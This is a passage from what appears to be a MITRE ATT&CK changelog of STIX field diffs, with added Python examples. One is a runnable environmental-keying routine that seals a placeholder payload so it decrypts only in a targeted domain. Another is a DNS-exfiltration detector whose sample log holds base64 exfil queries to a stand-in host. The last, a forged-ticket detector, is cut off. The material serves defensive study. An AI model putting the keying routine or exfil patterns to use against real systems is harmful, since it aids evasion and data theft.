invoked.(Citation: FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware) Since the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. |
| external_references[2]['source_name'] | Malware Persistence on OS X | Microsoft DART Case Report 001 |
| external_references[2]['description'] | Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. Retrieved July 10, 2017. | Berk Veral. (2020, March 9). Real-life cybercrime stories from DART, the Microsoft Detection and Response Team. Retrieved May 27, 2022. |
| external_references[2]['url'] | https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf | https://www.microsoft.com/security/blog/2020/03/09/real-life-cybercrime-stories-dart-microsoft-detection-and-response-team |
| x_mitre_data_sources[0] | Process: Process Creation | File: File Metadata |
| x_mitre_data_sources[1] | Windows Registry: Windows Registry Key Modification | File: File Creation |
| x_mitre_data_sources[2] | Command: Command Execution | Process: Process Creation |
| x_mitre_data_sources[3] | File: File Creation | WMI: WMI Creation |
| x_mitre_data_sources[4] | File: File Modification | Module: Module Load |
| x_mitre_data_sources[5] | WMI: WMI Creation | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[6] | File: File Metadata | File: File Modification |
| x_mitre_data_sources[7] | Module: Module Load | Command: Command Execution |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Backdooring an AWS account', 'description': 'Daniel Grzelak. (2016, July 9). Backdooring an AWS account. Retrieved May 27, 2022.', 'url': 'https://medium.com/daniel-grzelak/backdooring-an-aws-account-da007d36f8f9'} | |
| external_references | {'source_name': 'Varonis Power Automate Data Exfiltration', 'description': 'Eric Saraga. (2022, February 2). Using Power Automate for Covert Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.', 'url': 'https://www.varonis.com/blog/power-automate-data-exfiltration'} | |
| external_references | {'source_name': 'Malware Persistence on OS X', 'description': 'Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. Retrieved July 10, 2017.', 'url': 'https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf'} | |
| x_mitre_data_sources | Cloud Service: Cloud Service Modification | |
| x_mitre_platforms | SaaS | |
| x_mitre_platforms | IaaS | |
| x_mitre_platforms | Office 365 | |
| Description |
|---|
| Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduce collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019) Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match. |
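The Execution Guardrails description above and the Environmental Keying description earlier on this page draw one distinction: a guardrail compares an observed value against an expected one and proceeds on a match, while environmental keying turns those same values into the decryption key, so a package captured off-target holds nothing an analyst can run. The script below puts the two side by side. It is an added example, not code from ATT&CK or from any of the cited tools (Ebowla, Demiguise); the target properties (an AD domain and a share name, two of the value types the description lists), the payload bytes and the salts are constructed for the demo, and the cipher is a stdlib-only HMAC-SHA256 keystream with an encrypt-then-MAC tag standing in for a real AEAD so that the script runs without third-party packages.

```python
"""Execution guardrail vs. environmental keying, side by side.

Added example; not ATT&CK, Ebowla or Demiguise code. Target values, payload
and the HMAC-based cipher are this demo's own choices.
"""
import hashlib
import hmac
import os

PBKDF2_ROUNDS = 100_000   # raises the cost of brute-forcing guessable environment values


def fingerprint(env):
    """Canonical bytes for a set of target-specific values (sorted key=value lines)."""
    return "\n".join(f"{k}={v}" for k, v in sorted(env.items())).encode()


# --- Guardrail: the payload ships a salted hash of the expected environment and
# runs only when the observed environment hashes to the same value. The payload
# itself is still in the file, so an analyst who patches the check gets it.
def guardrail_token(expected_env, salt):
    return hashlib.sha256(salt + fingerprint(expected_env)).digest()


def guardrail_allows(observed_env, salt, token):
    candidate = hashlib.sha256(salt + fingerprint(observed_env)).digest()
    return hmac.compare_digest(candidate, token)


# --- Environmental keying: the same values derive the key, so the package
# contains salt, nonce, ciphertext and tag and nothing else.
def derive_key(env, salt):
    return hashlib.pbkdf2_hmac("sha256", fingerprint(env), salt, PBKDF2_ROUNDS, dklen=32)


def _keystream(key, nonce, length):
    """Counter-mode keystream built from HMAC-SHA256 (demo cipher, not AES)."""
    out = bytearray()
    block = 0
    while len(out) < length:
        out += hmac.new(key, nonce + block.to_bytes(8, "big"), hashlib.sha256).digest()
        block += 1
    return bytes(out[:length])


def seal(key, plaintext):
    nonce = os.urandom(16)
    ciphertext = bytes(p ^ k for p, k in zip(plaintext, _keystream(key, nonce, len(plaintext))))
    tag = hmac.new(key, nonce + ciphertext, hashlib.sha256).digest()   # encrypt-then-MAC
    return nonce + ciphertext + tag


def unseal(key, blob):
    nonce, ciphertext, tag = blob[:16], blob[16:-32], blob[-32:]
    expected = hmac.new(key, nonce + ciphertext, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        return None                     # wrong environment: nothing decrypts, nothing runs
    return bytes(c ^ k for c, k in zip(ciphertext, _keystream(key, nonce, len(ciphertext))))


def build_package(target_env, payload):
    """Operator side: key the payload to the intended environment."""
    salt = os.urandom(16)
    return {"salt": salt, "blob": seal(derive_key(target_env, salt), payload)}


def run_in(package, observed_env):
    """Stager side: derive a key from what this host looks like and try to unseal."""
    return unseal(derive_key(observed_env, package["salt"]), package["blob"])


# Constructed values for the demo.
TARGET_ENV = {"ad_domain": "corp.example", "share": r"\\fs01\finance"}
OTHER_ENV = {"ad_domain": "lab.example", "share": r"\\fs01\finance"}
PAYLOAD = b"<second-stage bytes>"

if __name__ == "__main__":
    salt = os.urandom(16)
    token = guardrail_token(TARGET_ENV, salt)
    print("guardrail on target:", guardrail_allows(TARGET_ENV, salt, token))
    print("guardrail elsewhere:", guardrail_allows(OTHER_ENV, salt, token))
    pkg = build_package(TARGET_ENV, PAYLOAD)
    print("keyed on target:   ", run_in(pkg, TARGET_ENV) == PAYLOAD)
    print("keyed elsewhere:   ", run_in(pkg, OTHER_ENV))
```

The practical caveat for both sides is the entropy of the environment values: if the only keying material is a short domain name, an analyst with a word list and the salt can try candidates offline, and the PBKDF2 cost is the only thing slowing that down. For a defender, the package's structure (random-looking blob, no key, a derivation routine that reads domain, share or adapter details) is itself the artifact to look for, since the sandbox will never see the payload decrypt.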
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-06-09 18:53:58.471000+00:00 | 2022-05-03 02:39:29.314000+00:00 |
| external_references[1]['source_name'] | FireEye Kevin Mandia Guardrails | FireEye Outlook Dec 2019 |
| external_references[1]['description'] | Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says U.S. malware is more restrained than adversaries'. Retrieved January 17, 2019. | McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved June 23, 2020. |
| external_references[1]['url'] | https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/ | https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html |
| external_references[2]['source_name'] | FireEye Outlook Dec 2019 | FireEye Kevin Mandia Guardrails |
| external_references[2]['description'] | McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved June 23, 2020. | Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says U.S. malware is more restrained than adversaries'. Retrieved January 17, 2019. |
| external_references[2]['url'] | https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html | https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/ |
| x_mitre_defense_bypassed[1] | Host forensic analysis | Host Forensic Analysis |
| x_mitre_defense_bypassed[2] | Signature-based detection | Signature-based Detection |
| x_mitre_defense_bypassed[3] | Static file analysis | Static File Analysis |
| Old Description | New Description |
|---|---|
| Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an attacker may opt to exfiltrate data using a Bluetooth communication channel. Adversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network. | Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel. Adversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-28 00:34:55.439000+00:00 | 2022-03-08 21:02:15.802000+00:00 |
| description | Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an attacker may opt to exfiltrate data using a Bluetooth communication channel. Adversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network. | Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel. Adversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network. |
| x_mitre_data_sources[0] | Network Traffic: Network Connection Creation | Network Traffic: Network Traffic Flow |
| x_mitre_data_sources[1] | Network Traffic: Network Traffic Flow | Command: Command Execution |
| x_mitre_data_sources[2] | Network Traffic: Network Traffic Content | Network Traffic: Network Connection Creation |
| x_mitre_data_sources[4] | Command: Command Execution | Network Traffic: Network Traffic Content |
| x_mitre_version | 1.0 | 1.1 |
| Old Description | New Description |
|---|---|
| Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel. Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network | Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel. Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_network_requirements | True | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-28 00:35:24.570000+00:00 | 2022-03-08 21:02:16.115000+00:00 |
| description | Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel. Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network | Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel. Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network. |
| x_mitre_data_sources[1] | Network Traffic: Network Traffic Flow | File: File Access |
| x_mitre_data_sources[2] | Network Traffic: Network Traffic Content | Command: Command Execution |
| x_mitre_data_sources[3] | File: File Access | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[4] | Command: Command Execution | Network Traffic: Network Traffic Flow |
| Description |
|---|
| Adversaries may steal data by exfiltrating it over an unencrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. |
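The description above says the data is encoded rather than encrypted and packed into protocol fields; for DNS the field is the query name itself, and the encoding leaves a signature a defender can score. The detector below, an added example and not ATT&CK content, runs over a constructed query log (format `<timestamp> <client_ip> <qtype> <qname>`, one query per line, invented for the demo) and flags labels that are long, drawn from the base64url/hex alphabet and high in entropy, then totals encoded characters per client. The regex, entropy floor and per-client budget are starting points chosen here, not tuned values; the allowlist handles the obvious false positive, CDN and SaaS names that legitimately use long random labels.

```python
"""Flag DNS queries whose labels look like encoded payload data.

Added detection example, not ATT&CK content. Log format and sample lines are
constructed for the demo; thresholds are starting points, not tuned values.
"""
import math
import re
from collections import defaultdict

# A label of 30+ characters drawn only from the base64url/hex alphabet is the
# shape tunnelling tools produce when they pack data into query names.
ENCODED_LABEL = re.compile(r"^[A-Za-z0-9_-]{30,}$")
MIN_ENTROPY = 3.5        # bits per character; host-name words sit well below this
SOURCE_BUDGET = 100      # encoded label characters per client before we alert


def shannon_entropy(text):
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def encoded_labels(qname):
    """Labels of qname that look like encoded data rather than host names."""
    return [lab for lab in qname.rstrip(".").split(".")
            if ENCODED_LABEL.match(lab) and shannon_entropy(lab) >= MIN_ENTROPY]


def registered_domain(qname):
    # Last two labels; production code should consult the public suffix list.
    return ".".join(qname.rstrip(".").lower().split(".")[-2:])


def analyze(lines, allowlist=frozenset()):
    """Return (flagged queries, clients over budget) for an iterable of log lines."""
    flagged = []
    chars_per_client = defaultdict(int)
    for line in lines:
        if not line.strip():
            continue
        ts, client, qtype, qname = line.split(maxsplit=3)
        if registered_domain(qname) in allowlist:
            continue            # known CDN/SaaS zones use long random labels legitimately
        labels = encoded_labels(qname)   # case kept: folding it would lower the entropy
        if labels:
            flagged.append((ts, client, qtype, qname))
            chars_per_client[client] += sum(len(lab) for lab in labels)
    over_budget = {c: n for c, n in chars_per_client.items() if n >= SOURCE_BUDGET}
    return flagged, over_budget


# Constructed sample log: one client pushing base64 through TXT queries, one
# talking to a CDN that uses long random host labels, and ordinary lookups.
SAMPLE_LOG = """\
2022-10-19T21:28:01Z 10.0.0.5 A www.example.com
2022-10-19T21:28:02Z 10.0.0.5 A mail.example.com
2022-10-19T21:28:03Z 10.0.0.7 TXT aGVsbG8gd29ybGQgdGhpcyBpcyBhIHRlc3Qgb2YgZXhm.0001.tunnel.example.net
2022-10-19T21:28:04Z 10.0.0.7 TXT aWx0cmF0aW9uIG92ZXIgRE5TIHdpdGggYmFzZTY0.0002.tunnel.example.net
2022-10-19T21:28:05Z 10.0.0.7 TXT IGVuY29kZWQgbGFiZWxzIGluIHRoZSBxdWVyeSBuYW1l.0003.tunnel.example.net
2022-10-19T21:28:06Z 10.0.0.9 A d1ab2c3d4e5f6g7h8i9j0k1l2m3n4o5p6q7r.cdn-provider.example
2022-10-19T21:28:07Z 10.0.0.5 A login.example.com
"""

if __name__ == "__main__":
    flagged, over = analyze(SAMPLE_LOG.splitlines(), allowlist={"cdn-provider.example"})
    for ts, client, qtype, qname in flagged:
        print(f"{ts} {client} {qtype} {qname}")
    print("clients over budget:", over)
```

The same scoring applies to the other carriers the description names: run `encoded_labels` over HTTP header values, URL path segments or FTP file names instead of DNS labels, and the per-client budget becomes a per-client byte count on that channel. Without the allowlist the CDN client is flagged once, which is the false-positive rate a SOC will see before tuning.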
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_network_requirements | True | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 22:49:28.421000+00:00 | 2022-04-12 19:57:45.277000+00:00 |
| name | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | Exfiltration Over Unencrypted Non-C2 Protocol |
| x_mitre_data_sources[0] | Network Traffic: Network Connection Creation | File: File Access |
| x_mitre_data_sources[1] | Network Traffic: Network Traffic Flow | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[2] | Network Traffic: Network Traffic Content | Command: Command Execution |
| x_mitre_data_sources[3] | File: File Access | Network Traffic: Network Traffic Flow |
| x_mitre_data_sources[4] | Command: Command Execution | Network Traffic: Network Connection Creation |
| x_mitre_version | 1.1 | 2.0 |
| Description |
|---|
| Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services. Web service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_network_requirements | True | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 22:50:29.607000+00:00 | 2022-10-19 21:28:34.699000+00:00 |
| x_mitre_data_sources[0] | Network Traffic: Network Traffic Flow | Network Traffic: Network Connection Creation |
| x_mitre_data_sources[1] | Network Traffic: Network Traffic Content | Network Traffic: Network Traffic Flow |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Network Traffic: Network Traffic Content | |
| Description |
|---|
| Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet. Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_network_requirements | True | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-28 01:02:24.172000+00:00 | 2022-08-30 12:49:02.969000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_data_sources[2] | File: File Access | File: File Access |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Network Traffic: Network Connection Creation | |
| Old Description | New Description |
|---|---|
| Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL)(Citation: NVD CVE-2016-6662), standard services (like SMB(Citation: CIS Multiple SMB Vulnerabilities) or SSH), network device administration and management protocols (like SNMP and Smart Install(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies. For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25) | Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies. For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-07-20 21:51:45.776000+00:00 | 2022-04-19 17:06:53.032000+00:00 |
| description | Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL)(Citation: NVD CVE-2016-6662), standard services (like SMB(Citation: CIS Multiple SMB Vulnerabilities) or SSH), network device administration and management protocols (like SNMP and Smart Install(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies. For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25) | Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies. For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25) |
| external_references[1]['source_name'] | NVD CVE-2016-6662 | CWE top 25 |
| external_references[1]['description'] | National Vulnerability Database. (2017, February 2). CVE-2016-6662 Detail. Retrieved April 3, 2018. | Christey, S., Brown, M., Kirby, D., Martin, B., Paller, A.. (2011, September 13). 2011 CWE/SANS Top 25 Most Dangerous Software Errors. Retrieved April 10, 2019. |
| external_references[1]['url'] | https://nvd.nist.gov/vuln/detail/CVE-2016-6662 | https://cwe.mitre.org/top25/index.html |
| external_references[3]['source_name'] | US-CERT TA18-106A Network Infrastructure Devices 2018 | NVD CVE-2016-6662 |
| external_references[3]['description'] | US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020. | National Vulnerability Database. (2017, February 2). CVE-2016-6662 Detail. Retrieved April 3, 2018. |
| external_references[3]['url'] | https://us-cert.cisa.gov/ncas/alerts/TA18-106A | https://nvd.nist.gov/vuln/detail/CVE-2016-6662 |
| external_references[4]['source_name'] | Cisco Blog Legacy Device Attacks | NVD CVE-2014-7169 |
| external_references[4]['description'] | Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020. | National Vulnerability Database. (2017, September 24). CVE-2014-7169 Detail. Retrieved April 3, 2018. |
| external_references[4]['url'] | https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 | https://nvd.nist.gov/vuln/detail/CVE-2014-7169 |
| external_references[5]['source_name'] | NVD CVE-2014-7169 | Cisco Blog Legacy Device Attacks |
| external_references[5]['description'] | National Vulnerability Database. (2017, September 24). CVE-2014-7169 Detail. Retrieved April 3, 2018. | Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020. |
| external_references[5]['url'] | https://nvd.nist.gov/vuln/detail/CVE-2014-7169 | https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 |
| external_references[7]['source_name'] | CWE top 25 | US-CERT TA18-106A Network Infrastructure Devices 2018 |
| external_references[7]['description'] | Christey, S., Brown, M., Kirby, D., Martin, B., Paller, A.. (2011, September 13). 2011 CWE/SANS Top 25 Most Dangerous Software Errors. Retrieved April 10, 2019. | US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020. |
| external_references[7]['url'] | https://cwe.mitre.org/top25/index.html | https://us-cert.cisa.gov/ncas/alerts/TA18-106A |
| Description |
|---|
| Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility. Several types exist: ### Browser-based Exploitation Web browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed. ### Office Applications Common office and productivity applications such as Microsoft Office are also targeted through [Phishing](https://attack.mitre.org/techniques/T1566). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run. ### Common Third-party Applications Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_data_sources | ['Process: Process Creation', 'Application Log: Application Log Content'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 19:01:34.932000+00:00 | 2022-04-18 18:48:06.141000+00:00 |
| x_mitre_version | 1.2 | 1.4 |
| Description |
|---|
| Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Credentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain access to systems. One example of this is MS14-068, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions.(Citation: Technet MS14-068)(Citation: ADSecurity Detecting Forged Tickets) Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained. |
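The description names MS14-068 and points at the ADSecurity guidance on detecting forged Kerberos tickets. The Python below is an added example, not part of the ATT&CK record or the cited sources, that applies two host-correlated checks to constructed Windows Security events: the account-domain anomaly described in that guidance (a 4624 logon whose Account Domain is blank or an FQDN rather than the NetBIOS name), plus a general service-ticket encryption-type check that is this example's own addition. Domain names, IP addresses, and the expected encryption types are assumptions for this environment.

```python
from collections import defaultdict

# Assumptions for this example: the domain's real NetBIOS name(s) and the ticket
# encryption types it is expected to issue. Adjust to the environment being monitored.
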